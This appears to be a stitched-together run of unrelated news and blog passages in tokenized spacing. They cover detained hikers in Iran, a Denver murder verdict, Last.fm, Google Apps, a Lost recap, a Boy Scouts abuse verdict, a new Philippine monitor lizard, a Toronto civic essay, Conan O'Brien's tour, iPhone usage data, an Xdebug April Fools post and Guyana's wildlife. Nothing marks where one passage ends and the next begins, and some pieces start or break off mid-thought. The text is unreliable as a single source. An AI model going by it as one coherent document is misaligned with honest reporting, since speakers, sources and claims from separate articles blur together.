If you 're anti-war , anti-capitalist , anti-occupation , help free the hikers .
If you oppose sexism , racism , and homophobia , help free the hikers .
If you believe in environmental justice and ecological sustainability , help free the hikers .
We need them out of there so they can be fighting with us here .
Please visit www.freethehikers.org to sign the petition , send letters to the U.S. and Iranian governments , and get in touch to help organize actions to protest their detention and demand their release .
Scott Campbell is a graduate student at NYU .
He writes and posts translations at his blog Angry White Kid : angrywhitekid.blogs.com
Barack Obama , 3 Years Old , With Grandfather , 1965
Photos of some of the most famous US presidents when they were just kids .
There is nothing special about them and there is no way to know , just by looking , that these boys would grow up to become the leader of the most powerful country in the free world .
More images after the break …
George W. Bush , 9 Years Old , With His Mother and Father , 1955
Bill Clinton , 5 Years Old , 1952
George H.W. Bush , 5 Years Old , With Sister Mercy , 1929
Ronald Reagan , 12 Years Old , 1923
Last.fm is retiring a feature whereby users could play any full song they like , and is instead outsourcing the feature to a range of third - party , cloud - based music services .
Before today , users could play tracks from artists on the corresponding track page ( though WBR had still not renewed with the site ) .
But track pages will now instead direct users to play the song on Spotify , Mog , Hype Machine , We7 , Vevo and other services to come , via what it 's calling ' playlinks ' ( see example ) .
Photo by topgold on Flickr .
Some rights reserved
Taking the music away is likely a cost - saver for Last.fm , which has always been better at crunching the social data around tracks than at music itself …
UK royalty collector PRS For Music more than halved its on - demand per-track rate last summer , from £ 0.0022 to £ 0.00085 per track - but many music sites still protest rates are excessive ; in Germany , they 're far higher .
The on - demand feature had only been available in the UK , U.S. and Germany .
Short track previews , as does non -on - demand playback ( themed ' radio ' streams in which the user can't pick tracks ) .
It may mean more paid - for downloads via Last . fm 's affiliates - 7digital , Amazon ( NSDQ : AMZN ) MP3 and iTunes Store .
Last.fm is also abandoning hosting music videos for itself , which never really became comprehensive , and instead falling back on embeds from YouTube and Vevo .
Feedback is mixed .
A Denver jury has convicted Willie D. Clark of murdering Denver Broncos cornerback Darrent Williams .
Clark , 26 , was accused of killing Williams and wounding two others early New Year ’s Day 2007 following an altercation outside the Shelter nightclub .
Prosecutors said Williams and his entourage were traveling in a white stretch Hummer limousine when they were ambushed by at least two gunmen in a passing white Chevrolet Tahoe .
Clark was convicted on all 21 charges , including two counts of first - degree murder – one for the murder of Williams after deliberation and one for murder with “ extreme indifference . ”
Also included were 16 counts of attempted murder , one each for the surviving passengers in the Hummer limousine .
Several of the jurors cried as judge Christina Habas read the guilty verdict .
Clark ’s defense attorneys asked Habas to poll the jury , and each of the 12 members confirmed their vote of guilty .
As the verdict was read , Darrent Williams ’ mother , Rosalind Williams , who attended each day of the trial , sat quietly .
She said later that as she heard the first verdict of “ guilty , ” she thought , “ This is a start . ”
“ It has been three years , three months and 11 days , but today ultimately shows that no one wins .
My family did n’t win .
The Clark family did n’t win , ” Rosalind Williams said .
“ I lost my son , my only son , and his children lost their father .
This does n’t bring him back .
But I just want something has to happen in society for us to stop gang violence .
It just has to stop . ”
Rosalind Williams said it made her feel like , “ a proud mom ” to hear testimony from witnesses that her son was a peacemaker , not an aggressor , in conflicts at the nightclub in the hours and minutes before his death .
Still , she said she is left with questions about why her son was murdered .
“ I have a few more answers , but a lot of questions , ” she said .
“ What would cause someone to do a senseless crime , to do a drive - by shooting .
I think that ’s just such a cowardly act . ”
A large group of Clark ’s friends and family members gathered in the hallway on the fourth floor after leaving the court room , and all declined to speak to reporters .
Defense attorney Darren Cantor said Clark ’s family was too upset to give any comments .
Cantor also declined to speak about the verdict .
Cantor and Abraham Hutt also represent Clark in Clark ’s other pending murder case .
Clark and two others , including Brian Hicks , are accused of killing witness Kalonniann Clark in a different case .
Clark will be sentenced in this case on April 30 .
Broncos President and CEO Pat Bowlen released a statement after the verdict thanking police and prosecutors for their work .
“ Nothing can ever bring Darrent Williams back or ease the suffering for Rosalind and her grandchildren .
But after three long years , it is very gratifying to see closure brought to this case .
This process has been extremely difficult for the Williams family , his friends and teammates , this community , and the entire Denver Broncos organization , ” Bowlen said in the statement .
“ Darrent ’s legacy will live on for all of us in the Broncos organization , and the outstanding work done each day at the Darrent Williams Memorial Teen Center is a tribute to his impact on this community .
Our hearts continue to go out to the entire Williams family . ”
Jurors heard 11 days of testimony from more than 40 witnesses , many of whom were fellow gang associates of Clark who had reached plea agreements in other cases in exchange for their testimony .
They deliberated for about 12 hours over parts of three days .
The prosecution ’s key witness , Daniel “ Ponytail ” Harris , had his prison time reduced from a potential life sentence to five years .
Harris was the only witness to identify Clark as the man who shot at the Hummer limousine .
Prosecutors said Clark was driving the white Tahoe , and shot a .40 caliber gun out the passenger window .
Williams was struck in the neck by one .40 caliber bullet .
No fingerprints or gun residue was found inside the Tahoe , which was discovered several days later , the inside burned - out and the outside spray painted black .
Two star players for the Denver Broncos , wide receiver Brandon Marshall and pass rusher Elvis Dumervil , also testified for the prosecution .
Defense attorneys said Clark was a scapegoat for a group of drug dealers who wanted him to take the blame for the shooting in order to take the heat off their drug business
Clark ’s attorney ’s said Clark was not in the white Tahoe , and floated the theory that a green SUV – driven by and belonging to different men – could have been used in the shooting .
Before the verdict was read , Judge Christina Habas thanked Clark for his “ conduct throughout this trial , ” and asked everyone in the courtroom to keep their emotions in check as the verdicts were read .
There was no audible reaction from anyone in the courtroom as the clerk read the verdicts .
Lindsay Jones : 303-954-1262 or ljones@denverpost.com
Introduction Across our many tutorials we have looked at hundreds of different technologies .
In almost every article , we 've based our work on Apache or NGINX ...
Motor Breakdown UK .
Rating 3.5 out of 5 . Based on 108 ratings .
108 user reviews .
Our Motor Breakdown
Assistance is available 24 - hours a day , 7 days a week and you can choose from a flexible range of benefits , which are competitively priced .
Covermybreakdown.co.uk is able to provide you with first class motor breakdown cover with 4 cover levels to suit your requirements .
*
The above prices are based on a vehicle under 6 years of age .
This policy is underwritten by MAPFRE ASISTENCIA SA who are holders of the prestigious ITIJ Award given to the best Assistance Company in the world .
MAPFRE ASISTENCIA guarantees its insured the assistance they require for their cars and in association with Covermybreakdown .
co.uk are committed to providing you with a first class Motor Breakdown service , should you require assistance at the roadside , at your home or even in Europe .
Google Apps ?
Google Apps are a joke .
Thus far , Microsoft ( MSFT ) is doing a good job of holding off Google Apps ( GOOG ) .
The demand for Office 2010 appears to be strong , and most companies that spoke to Nick Wingfield of the WSJ for an article about the Apps - Office 2010 clash said they never seriously considered using Google .
But they did use Google as a threat to negotiate a better deal from Microsoft , which is the first sign of trouble .
And the second sign of trouble is that Google Apps now have 50 million users .
True , only 1 million of these are paying users .
Many of the paying users , moreover , probably pay less than Google 's asking price of $ 50 a year .
So this is still a tiny business for Google -- less than $ 50 million a year on a base of $ 25 billion .
But the size of the revenue contribution to Google should come as no solace to Microsoft .
In fact , the cheaper and easier Google Apps are to use , the more of a problem they 'll be for Microsoft over the long haul .
And the widespread adoption suggests that they 're quite convenient and easy to use .
Disruptive technologies , Clayton Christensen fans will recall , gain their foothold by being adopted by the low end of the market , where they are not as good as the market leader but are cheaper , more convenient , and " good enough . "
And Google Apps certainly fit that description for many early users .
SAI Google Apps , in other words , still look like a classic disruptive technology .
And in their path is a massive Microsoft cash cow , one that accounts for more than half of Microsoft 's profit .
Over time , like other disruptive technologies , Google Apps will get better .
As they do , they 'll migrate up from the low end of the market toward the middle .
Microsoft , meanwhile , will try to protect its most profitable business by adding ever more features to Office .
Eventually ( already ? ) the number of features will overshoot the needs of the middle of the market .
And as long as Google Apps have become good enough to meet the mid-market 's needs , Google will start to gain major share .
So do n't take the puny size of Google 's App business and the fact that big companies are n't seriously considering Apps as an alternative as a sign that Microsoft is safe .
Microsoft is n't safe .
Microsoft is very exposed .
As of the 2018 - 19 season , my work will appear exclusively at The Athletic .
Do n't have a subscription ?
You can sign up today by clicking the offer link at the bottom of my posts , or read for free with a one - week trial .
My archives from other sites can be found here :
In honor of the Ben-centric episode Dr. Linus coming up tonight , I wanted to take another look at this clip from The Substitute .
Starting at 0:52 , we see Sideways Ben , wearing a sweater vest , in the teacher ’s lounge , fussing over the coffeepot , saying :
How many times do we have to go over this .
If you have the last cup of coffee , you remove the filter , and throw it away .
Fear not , I will make a fresh pot
Every office , every workplace has someone like this .
Here , in this sideways school , Ben is that guy .
Michael Emerson ’s inflection is perfect .
I think everyone who has ever worked anywhere that had a communal coffeepot must feel at least a twinge of recognition .
What I love about this scene :
— It ’s so real , such a part of everyday life , yet something that does n’t often get portrayed in a drama , especially not a drama tackling such big issues as good versus evil , free will versus destiny , and faith versus reason .
— Michael Emerson is an acting god .
To go from the terrifying Henry Gale of Season 2 , to the prissy sweater - vest guy in this clip — and to make each one absolutely 100 % convincing — is sheer genius .
— Sideways Ben and Sideways Locke seem to have an instant rapport , a mutual respect .
Very interesting .
I also wonder what this scene tells us about the sideways world .
We ’ve seen some of the sideways characters get what they want or need : Locke gets Helen , a good future , a sense of humor about his plight , and a healthy sense of boundaries .
Hurley gets good luck .
Kate gets away .
But the sideways world is n’t a Disnified land where all dreams come true .
Sayid gets to be with Nadia , but only on the fringes of her life .
And everyone still seems to be controlled by their character .
Hurley is still warm - hearted , but Sayid is still violent .
What does it mean , then , that Ben , the larger - than - life arch - villain in the Island world , here seems so ordinary ?
What did Jacob do ( if it was , in fact , Jacob who did it ) to transform this Milquetoast into a cool killer ?
Or is Ben not quite as ordinary as he seems here ?
That ’s a possibility .
Maybe we ’ll find out more about that tonight , in Dr. Linus .
A $ 1.4 - million damages award this week to an Oregon man has severely dented the reputation of the Boy Scout movement in America , and the Church of Latter Day Saints .
A Portland jury awarded damages to Kerry Lewis , 38 , after the court heard of the abuse he suffered at the hands of Timur Dykes , an assistant scout master , an authorised Mormon representative – and serial molester of young boys .
And , according to this report , there could be more financial damage to come , with jurors set to go back to court next week to decide whether the Scouts must pay up to $ 25 million in punitive damages .
The bigger hit is the potential damage to their image .
This case has gotten more national attention because of the files .
The verdict delivered by the jury was based partly on the introduction as evidence of more than 1,000 so - called “ perversion files ” secretly kept by the Boy Scouts of America at the group ’s national headquarters from 1965 to mid-1984 .
The Boy Scouts already plans to appeal and argue that those files are outdated and do not reflect current prevention efforts or even past policy .
Patrick Boyle , editor of the Youth Today newspaper and author of a book about sex abuse within the Scouts , said the damages so far are not a huge financial burden for the organisation .
But it reminds people about the problems the Scouts have had with abusers among their leaders and volunteers in the past – and that secret files have been kept to identify them .
According to Boyle and trial testimony , the practice of keeping secret files on Scoutmasters and volunteers dates back to shortly after the Scouts were founded in 1910 .
The documents were first revealed in 1935 when The New York Times reported a speech by James West , the first chief scout executive , who said the Boy Scouts kept a “ red flag list ” of leaders who had been removed for various causes .
The files were later nicknamed “ perversion files ” but were mostly forgotten and eventually labelled “ ineligible volunteer ” or “ IV ” files , held under lock and key at headquarters .
Lawyers for the Scouts argued the files helped weed out suspected child molesters .
But the attorneys for Kerry Lewis argued that keeping them secret meant that parents , children and volunteers were not warned about the risk of sexual abuse .
Worse , said attorneys Kelly Clark and Paul Mones , was the failure of the Scouts to set up a system to prevent and report abuse , and make it a top priority among all its members – despite decades of files .
The lawyers focused on the files from 1965 to mid-1984 in their case , calling them the “ tip of the iceberg ” because sex abuse is considered to be greatly under - reported , especially in that era .
Clark and Mones said the abuse that Lewis , 38 , endured as a boy in the early 1980s was an illustration of the scope of the problem .
Timur Dykes , acknowledged in early 1983 that he had abused 17 Boy Scouts .
But despite the admission to a bishop for the Church of Jesus Christ of Latter - day Saints , which sponsored the Scout troop , Dykes continued to associate with Lewis and other Scouts .
Lewis ’ parents did not learn the truth about Dykes until a police officer made a routine traffic stop during a camping trip and discovered that Dykes had a record , and arrested him in front of Lewis and other boys .
Dykes was later convicted three times of various abuse charges involving boys and served time in prison .
Shortly before the Portland trial , he acknowledged in a deposition to abusing Lewis .
The jury found the Boy Scouts negligent , which the organisation had denied , pointing the finger instead at Dykes and suggesting at times that parents and the Mormon church shared some blame .
It was the charter organization for an estimated third to half of the Boy Scout troops in the nation in the 1980s .
One witness for the Scouts even called parents “ criminal ” for allowing them to repeatedly sleep over at the man ’s house .
The church settled its portion of the Portland case before trial .
Its $ 350,000 of the $ 1.4 million award , or 25 percent , was considered to be part of the settlement , so that money has already been paid , said church attorney Steve English .
By Matt Walker
Editor , Earth News
A close look at the giant Varanus bitatawa
A new species of giant lizard has been discovered in the Philippines .
The 2 m - long reptile is a monitor lizard , the group to which the world 's longest and largest lizards belong .
The monitor , described as spectacular by the scientists who found it , lives in forests covering the Sierra Madre mountains in the north of the country .
The striking reptile has bright yellow , blue and green skin , and survives on a diet of just fruit , yet until now it has escaped the eyes of biologists .
" It is an incredible animal , " says Dr Rafe Brown , one of the scientists who describe the new lizard in the journal Biology Letters .
In the journal , the researchers describe how rare it is to find such a large terrestrial animal new to science .
The discovery of the lizard , they say , is of a similar importance to two other large species of so - called " mega - fauna " discovered in recent years : the kipunji ( Rungwecebus kipunji ) , a new genus of monkey found in Africa , and the saola , a Vietnamese forest bovid ( Pseudoryx nghetinhensis ) .
The giant lizard is actually well known to resident Agta and Ilongot tribespeople living in the forests of northern Luzon Island .
The tribespeople regularly hunt the lizard for its meat , a vital source of protein .
Yet scientists were unaware of its existence .
That was until Dr Brown and an international team of colleagues from the US , Philippines and The Netherlands surveyed a series of lizard specimens preserved in museums both within the US and Philippines .
Within these specimens they identified the new species on the basis of its body size , scales , colouration and DNA .
With a main body length approaching 1 m , with an additional 1 m - long tail , the lizard has dark skin covered by golden yellow spots and flecks .
The new species is strikingly yellow
Its legs are mainly yellow , and its tail striped black and yellow .
In some pictures , the animal also looks to have green or blue scales .
The new species , which is called Varanus bitatawa , is thought to survive on a diet of fruit , making it one of just three species of fruit - eating monitor lizards in the world .
Monitor lizards include the world 's most massive lizard , the Komodo dragon ( V. komodoensis ) , which can reach up to 3 m - long and weigh up to 90kg .
While not as massive , other species of monitor , such as the Crocodile monitor or Salvadori 's monitor ( Varanus salvadorii ) of New Guinea , can also reach similar lengths .
Secretive creature
Why the new massive lizard has remained undiscovered by scientists until now is a mystery , especially as many biologists work in the northern Philippines .
The researchers say it may be because the lizard is naturally reclusive , being a highly secretive animal that never leaves the forest or crosses open country .
It could also be because few scientific expeditions have characterised the reptiles living in the Sierra Madre forests .
The new species of monitor lives at least 150 km away from its nearest relative , another lizard called V. olivaceus , which also lives in trees and eats fruit .
O n this day , March 6 , in the year 1834 , the problem started .
Perhaps it is uncharitable to view the incorporation of the City of Toronto as " the problem , " but there you have it .
The record shows – and if history is not your drug , feel free to disagree – that the act proclaiming the creation of this City with a capital " C , " born of the town of York , foretold a preoccupation with regulation and order and things specific while all but ignoring the creation of the city as a glorious cause .
Glorious cause ?
Yes .
In the pursuit of which this newspaper has chosen this day , this anniversary of the passage of the original City of Toronto Act , to spur readers to rise up .
This is your call to arms to lead the political dialogue in the months ahead right to election day , Oct. 25 .
My City ; Your City .
The conversation starts now .
We 've come a long way from 1834 .
Yes , 19th - century victualling houses required regulation .
Swimming at the docks demanded curtailment .
Licences needed to be issued , not least for " auctioneers , butchers , cartmen and cartage , hawkers and peddlers , all persons exhibiting for gain or profit any puppet - show , wire - dance , circus - riding , or any other idle acts or feats which common showmen , mountebanks , circus riders or jugglers usually practice or perform . "
Only between the selling of pickled fish and the enforcement of the sweeping of chimneys and well before the seizing of spoiled meat ( a strong commercial taint runs through much of the act ) does one find the omnibus mandate " to provide for the permanent improvement of the said City and the Liberties thereof , in all matters whatsoever , as well ornamental ( sic ) as useful . "
Well , there were almshouses for the poor .
It is n't much .
The city was left to define itself , ornamentally and usefully .
Incrementally it attended to – or failed to attend to – matters of health and social equity and housing and transit and the environment and the waterfront while making decisions as to whether , or not , a swim in a public pool on a hot August night will be free or carry the unconscionable economic penalty of a loonie charge .
That 's a position point in My City .
Is it a bone of contention in Your City ?
Do you care ?
You must .
Only from this foundation will we then be able to argue :
What do we want the city to be ?
More precisely : What do you want it to be ?
Be passionate .
It is time to get ahead of the strategically placed episodic pronouncements of the various mayoralty candidates .
With the assistance of the Internet we are democratizing this municipal election .
Our dedicated web - based initiative launches with 30 city - smart bloggers , an internet spandrel that will spark adulation and anger .
Both of those responses we like .
Indifference ?
Not so much .
Do n't care for what you 're reading ?
Then apply to be a blogger too :
We 're accepting applications .
Opine .
Report .
Send us a video .
Argue your case .
Good ideas will be looped into bigger projects and broader platforms .
Thinkers , dreamers and doers will be afforded their moment .
Reader surveys will assist in prioritizing topics for future stories .
No kidding : the sky 's the limit .
Ideas big .
Ideas small .
We want them all .
Enrique Penalosa , mayor of Bogotá a decade ago , included this in his definition of a good city : " When sidewalks can accommodate at least two wheelchairs right next to each other . "
I love that .
Some will say we are idealistic .
With that we will not argue .
As the great Scot and 19th - century city planner Patrick Geddes wrote , idealism and " matter of fact " are inseparable : " Our daily steps are guided by ideals of direction , themselves unreachably beyond the stars , yet indispensible to getting anywhere , save indeed downwards . "
Downwards is where we do not want to go .
The city creaks into gridlock and stasis .
The gap between rich and poor : wider .
The cities agenda , which once gained national traction , is diminished by harsh economic realities and , perhaps , a lack of resolve .
The city 's finances teeter under the pressure of structural deficit , which raises the cry in some quarters for more outsourcing , more privatization , more service reductions .
We 're going to be hearing a lot of that in the weeks to come .
Carve and cut : electoral platforms built on taking away as opposed to the inviolate belief in what must be protected .
Little wonder it is so much easier to see what we have lost rather than what we have gained .
There is loss in My City .
I recall those days a quarter century ago when I would write to the comforting pa-dunk of a puck against the rink boards in the schoolyard across from my home .
That rink has been gone a long time now .
So too the city - tended winter skates on Grenadier Pond , a warming moment where families , regardless of means , would gather on Sunday afternoons .
My husband and I stare at the bill for waste disposal and wonder , what 's better ?
What have we gained , he asks ?
I have gained an awful lot of time sitting on the King streetcar , and that 's not a good thing .
There have been improvements on the waterfront .
That is true .
There has been progress in recycling .
A full - service bank anchors the rebirth of Regent Park , an arrival spurred , ahem , by this very newspaper lamenting how the banks had bailed on servicing the poor .
Is that Your City ?
Who 's Your City ?
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
How does Your City present itself to the world ?
There are many moments one could choose to pinpoint the nadir of Toronto 's attempts at self - definition .
Yes , this matters .
Tourism matters .
Identity matters greatly .
Yet let us recall June , 2005 , when the city branded itself as " Toronto Unlimited , " a marketing exercise that stands out for all the wrong reasons – for its bland , meaningless slogan and for the dreary , institutional logo that came with it .
" It is a mindset impossible to shake , " was one of the city 's pitch lines , which only invited disagreement .
No spark .
No soul .
Nothing like the stirring I ( Heart ) NY campaign , created in the wake of that great city 's brush with bankruptcy , when the teachers union agreed , if necessary , to use their retirement funds to backstop loans to the city .
Is it a horrible thought to imagine that Toronto has to face a greater crisis in order to come to terms with itself ?
Today we are not ardent .
We are too often plain vanilla .
Promises to deliver an integrated street furniture program to put a handsomer face on the city have met with disappointing results .
New street signs pop up in the neighbourhood , blue and white and topped with a school book etching of city hall .
Earnest , funless and utterly lacking in charm , culture and character .
The neighbourhood is not city hall , which is home to schoolyard taunts and wall - to - wall dysfunction .
The neighbourhood is the best thing about the city .
It is the locus of that " social mobilization " to which city thinker David Pecaut would refer .
Clusters of energy and brainpower and enthusiasms .
In My City we would not rename The Junction .
In My City we would advertise Junction art galleries to the world .
Perhaps you disagree .
Patrick Geddes defined a city thusly : " A city is more than a place in space ; it is a drama in time . "
You are its players .
Starting today , the stage is yours .
Related links :
Your City , My City blog
30 bloggers , 30 visions of the city
More Your City , My City stories
UPDATE 8:45 AM
Tickets , predictably , are going fast for the Coco tour .
O’Brien just tweeted that more dates are being added in New York and Chicago .
" For that second show , I ’ll be doing all Liza Minnelli songs , " O’Brien tweeted .
Do n’t be surprised if other big cities like LA and Vegas get extra nights as well .
O’Brien also asked fans to go directly to Ticketmaster.com since TeamCoco has been jammed with traffic .
As for his official tweet announcing the tour ?
" Hey Internet : I ’m headed to your town on a half - assed comedy & music tour .
Go to http://TeamCoco.com for tix .
I repeat :
It ’s half - assed , " he wrote .
ORIGINAL POST
Conan O’Brien will begin his Legally Prohibited From Being Funny on Television Tour April 12 in Eugene , Oregon , working his way across the United States and Canada over the course of two months .
O’Brien will hit at least 20 states and 30 cities between April 12 and June 14 — including the famed Bonnaroo Music Festival .
More dates are expected to be added in the coming weeks .
Coco will tour with sidekick Andy Richter and members of his former " Tonight Show " band , offering up " a night of music , comedy , hugging , and the occasional awkward silence , " promoters promise .
“ It was either a massive 30 - city tour or start helping out around the house ” O’Brien said in a statement provided to TheWrap by his publicist .
( For a complete list of cities and dates , click here . )
Jeff Ross , O’Brien ’s longtime producer on both " Tonight " and " Late Night , " has been using his music promotion roots to help spearhead the organization of the travelling revue .
He said there was a very good reason for taking The Coco Show on the road .
" If we do n’t get Conan in front of an audience soon , there ’s gonna be real trouble , " Ross told TVMoJoe .
The Wrap first reported news of the tour last month .
O’Brien is expected to make an official statement about the tour to his followers Thursday morning via his Twitter account .
Tickets will be available for purchase via O’Brien ’s new official website , TeamCoco.com , or via Ticketmaster .
They ’ll range in price from as little as $ 34 to as much as $ 79 ( though a few casino dates may be priced higher , while the usual VIP packges offered by promoters will run in the hundreds of dollars ) .
American Express has signed on as corporate sponsor of the tour .
TeamCoco.com will expand in the coming weeks to include more O’Brien - themed content .
After spending the first few weeks touring the northwest —
Oregon , Washington , Vancouver , Alberta and San Francisco– the Coco Express will hit Los Angeles April 24 , with a date at the Gibson Ampitheater in Universal City — mere feet away from his onetime " Tonight Show " home on the NBC - owned Universal lot .
Up next : stops in San Diego and Phoenix , followed by a May 1 visit to the Palms Casino in Las Vegas .
O’Brien then heads north again ( Reno , San Jose , Sacremento ) before cruising east ( Boulder and Denver ) .
The tour hits the south on May 13 ( Dallas ) and May 14 ( Austin ) , headed back north Minneapolis ( May 18 ) , Chicago ( May 19 ) , Toronto ( May 22 ) and Altantic City ( May 30 ) .
The final east coast leg of the tour finds O’Brien returning to two of his home cities : New York on June 1 and Boston on June 4 .
And yes , while in the Big Apple , O’Brien will play Radio City Music Hall — located right in the center of NBC ’s 30 Rock corporate headquarters .
After dates in Connecticut , Pennsylvania and Washington , D.C. , O’Brien hits the tents of Bonnaroo June 11 before wrapping the tour June 14 in Atlanta .
If all goes well , O’Brien might then leave the road and begin preparing for a new late - night talk show .
Fox and O’Brien ’s camp are continuing to research the economic feasibilty of launching a new show on the network .
( For a full list of tour dates and venues , click here ) .
Ross said he and other members of the O’Brien camp began discussing the concept of a tour while they were putting together their final week of shows at NBC in January .
O’Brien got particularly pumped when he performed " Free Bird " with Will Ferrell on his final show .
Along with O’Brien ’s manager , Gavin Polone , Ross asked the music and touring unit of William Morris Endeavor ( where O’Brien is repped ) to begin looking into whether venues would be interested in an O’Brien tour .
According to Ross , there was more interest in the idea than anticipated .
Once O’Brien ’s " Tonight " tenure wrapped , he and WME began actively shaping the event .
The massive tour , along with O’Brien ’s near - daily tweets , are allowing the former late - night host to keep up some of the massive momentum he got from his final weeks on the air at NBC .
O’Brien ’s exit agreement with the Peacock does n’t allow him to perform on television , but does n’t keep him from appearing live .
There had been talk about taking the revue overseas to the UK and pehaps other countries in Europe .
For now , however , there ’s no plan to do so .
One other note : Longtime Coco bandleader — and E Street Band legend– Max Weinberg is n’t joining the tour .
Just 2 percent of all iPhone OS handsets still in use are Apple 's first - generation iPhone , but a new calculation estimates that amounts to nearly 30 percent of the 6.1 million iPhones sold between June 2007 and July 2008 .
Mobile advertising firm AdMob released its monthly Mobile Metrics report on Tuesday , which included information on the hardware and software used by owners of Apple 's handsets in the month of March .
The data revealed that just 2 percent of all iPhone OS - based handsets that accessed the AdMob network were the first - generation iPhone .
Philip Elmer - DeWitt of Fortune Brainstorm
Tech took the data one step further , and factored in Apple 's announced total of 85 million worldwide iPhone and iPod touch sales .
After it debuted in June 2007 until the iPhone 3G came out in July 2008 , the first - generation iPhone sold 6.1 million units , which is about 7 percent of the 85 million total handsets sold .
" If 7 % of those iPhone 1Gs are driving 2 % of AdMob 's traffic , " Elmer - DeWitt wrote , " that suggests that nearly one in three is still ticking — and visiting the Web . "
Though the first iPhone has been supported since its release , Apple earlier this month announced that its forthcoming iPhone OS 4 upgrade will not be available for the first - generation device .
In addition , the iPhone 3G , first released in 2008 , will not have the mobile operating system 's multitasking support available for the faster iPhone 3GS .
AdMob 's latest report also revealed that the iPhone 3GS is the most popular iPhone , generating 39 percent of all its network 's traffic in March 2010 .
That 's up from the 30 percent total seen by its network in September 2009 .
All versions of the iPhone represent 60 percent of the iPhone OS devices found on the AdMob network .
The iPod touch represents the other 40 percent , with the second - generation iPod touch the second most popular device , behind the iPhone 3GS .
The second - gen iPod touch accounted for 25 percent of iPhone OS devices in March 2010 , beating out the iPhone 3G which was represented by 20 percent of Apple 's mobile devices .
Xdebug no longer Open Source
London , UK
This was obviously an April Fools ' joke , Xdebug will continue to stay Open Source and free of charge .
Later today I will be releasing the first Release Candidate of Xdebug 2.1 .
With regret I have to announce that from this release , I will no longer provide Xdebug as an open source debugger extension .
I 've noticed that there are other projects making money of Xdebug 's success while I only receive donations from a group of awesome supporters .
Xdebug will continue to be available for benefactors on a limited number of platforms that I have access to ( Linux 32/64 bit and Windows ) .
Please refer to the FAQ for further information .
Guyana has banned gold dredging in the Rewa Head region of the South American country after pressure from Amerindian communities .
A recent expedition to Rewa Head turned up unspoiled wilderness and mind - boggling biodiversity .
The researchers , in just six weeks , stumbled on the world ’s largest snake ( anaconda ) , spider ( the aptly named goliath bird - eating spider ) , armadillo ( the giant armadillo ) , anteater ( the giant anteater ) , and otter ( the giant otter ) , leading them to dub the area ‘ the Land of the Giants ’ .
“ During our brief survey we had encounters with wildlife that tropical biologists can spend years in the field waiting for .
On a single day we had two tapirs paddle alongside our boat , we were swooped on by a crested eagle and then later charged by a group of giant otters .
I think that about sums the place up .
There is little human disturbance in the Rewa Head and wildlife flourishes , ” one of the expedition members , Rob Pickles , said in a press release .
The photo shows an “ inquisitive adult male giant otter approaching the boat .
While some individuals are remarkably fearless and will approach to within several yards of the boat , the mood of the group is determined by the breeding female .
If she feels threatened the group will normally ‘ periscope ’ and disappear , ” according to Biodiversity Report on Rewa Head .
Photo by Robert Pickles .
Pickles , a PhD student studying giant river otters , teamed up with another PhD student , tapir - expert Niall McCann , to explore the area with the aid of the Zoological Society of London ( ZSL ) .
Astonishingly the team encountered six anacondas during their expedition , four of which were over 16 feet long .
But it was n’t just big species that the team recorded , but rare ones as well .
Pickles and McCann recorded the presence of half of Guyana ’s listed threatened species during their expedition , including crested and harpy eagles , as well as the little - seen bush dog .
“ Visiting the Rewa Head felt like we were walking in the footsteps of Wallace and Bates , seeing South America with its natural density of wild animals as it would have appeared 150 years ago , ” Pickles told mongabay.com in a recent interview
regarding their expedition .
The ban on gold mining has been entirely due to efforts by the local Amerindian communities .
Pickles says that gold mining was a “ major , imminent threat ” to the pristine area .
However , despite the good news that Guyana has banned gold mining in the area , the Rewa Head remains threatened .
“ [ The area ] currently lies in a logging concession .
Unless Guyana is given alternative financial incentives , its government will be forced to lease its land to oil drillers , miners and loggers .
One of the world ’s last Edens is on the brink of destruction , ” explains Niall McCann .
Currently , the US - owned company , Simon and Shock International , has a license to extract timber from 400,000 hectares , while oil drilling concessions cover 78 million hectares .
McCann and Pickles are working with ZSL conservationists to gain international support for the government of Guyana ’s plan to conserve its vast forests as a carbon sink for financial returns .
According to the conservationists , the area is a perfect testing ground for projects like REDD +
( Reducing Emissions through Deforestation and Forest Degradation ) .
“ Guyana is in an incredibly fortunate position in that it still retains 76 percent of its forest cover which constitutes some of the most carbon - rich forests of South America .
As such , and with a president keen to offer his nation ’s forests as part of the world ’s carbon sink , Guyana should be embraced by the international community , ” Pickles told mongabay.com in the interview .
In all Pickles and McCann recorded 251 bird species and 33 large mammal species in Rewa Head .
“ In the wake of Copenhagen and the build up to the Convention on Biological Diversity , reducing biodiversity loss and greenhouse gas emissions are high on the political agenda .
Protecting areas such as the Rewa Head through sustainable management is a positive strategy for addressing these key issues , ” said Professor Jonathan Baillie , Director of Conservation at ZSL , adding that “ global leaders need to recognize that real economic benefits are to be gained through the conservation , not destruction , of our world ’s living things . ”
To read the interview with Robert Pickles : Guyana expedition finds biodiversity trove in area slated for oil and gas development , an interview with Robert Pickles
Anaconda found in Rewa Head .
Photo by Ashley Holland .
The jaguar Panthera onca is classified as Near Threatened : a previous six - week expedition to Rewa Head observed ten jaguars .
Photo by : Ashley Holland and Gordon Duncan .
World ’s largest spider , the goliath bird - eating spider Theraphosa blondii , from Guyana ’s interior .
Photo by : Gordon Duncan .
According to biodiversity report : “ In the dry season huge sandy beaches are exposed in the Lower Rewa , providing a nesting ground for giant South American river turtles ( Podocnemis expansa ) .
The superabundance of eggs laid in these sand banks is a boon which many forest species time their breeding cycle to coincide with . ”
Photo by Ashley Holland .
Brazilian tapir Tapirus terrestrisi photographed 10ft from the expedition boat .
The Brazilian tapir is classified as Vulnerable .
Photo by : Robert Pickles .
Schneider ’s dwarf caiman Paleosuchus trigonatus .
Photo by : Niall McCann .
“ Hand - axe sharpening grooves and geometric designs below Corona Falls on the River Rewa testify to the fact that there were once indigenous people inhabiting this area , ” according to Biodiversity report .
Photo by : Rob Pickles .
Logging and oil concession in Rewa Head .
Map courtesy of Mike Robert Pickles .
Related articles
Guyana expedition finds biodiversity trove in area slated for oil and gas development , an interview with Robert Pickles
( 11/29/2009 )
An expedition deep into Guyana ’s rainforest interior to find the endangered giant river otter — and collect their scat for genetic analysis — uncovered much more than even this endangered charismatic species .
“ Visiting the Rewa Head felt like we were walking in the footsteps of Wallace and Bates , seeing South America with its natural density of wild animals as it would have appeared 150 years ago , ” expedition member Robert Pickles said to Mongabay.com .
Guyana to increase oversight of gold mining under deal to save forests with Norway
( 12/21/2009 )
As apart of a deal with Norway to preserve its rainforests , Guyana will step up oversight of its gold mining industry , which has been accused of causing significant environmental damage including deforestation and mercury and cyanide pollution .
Norway to give Guyana up to $ 250 M for rainforest conservation
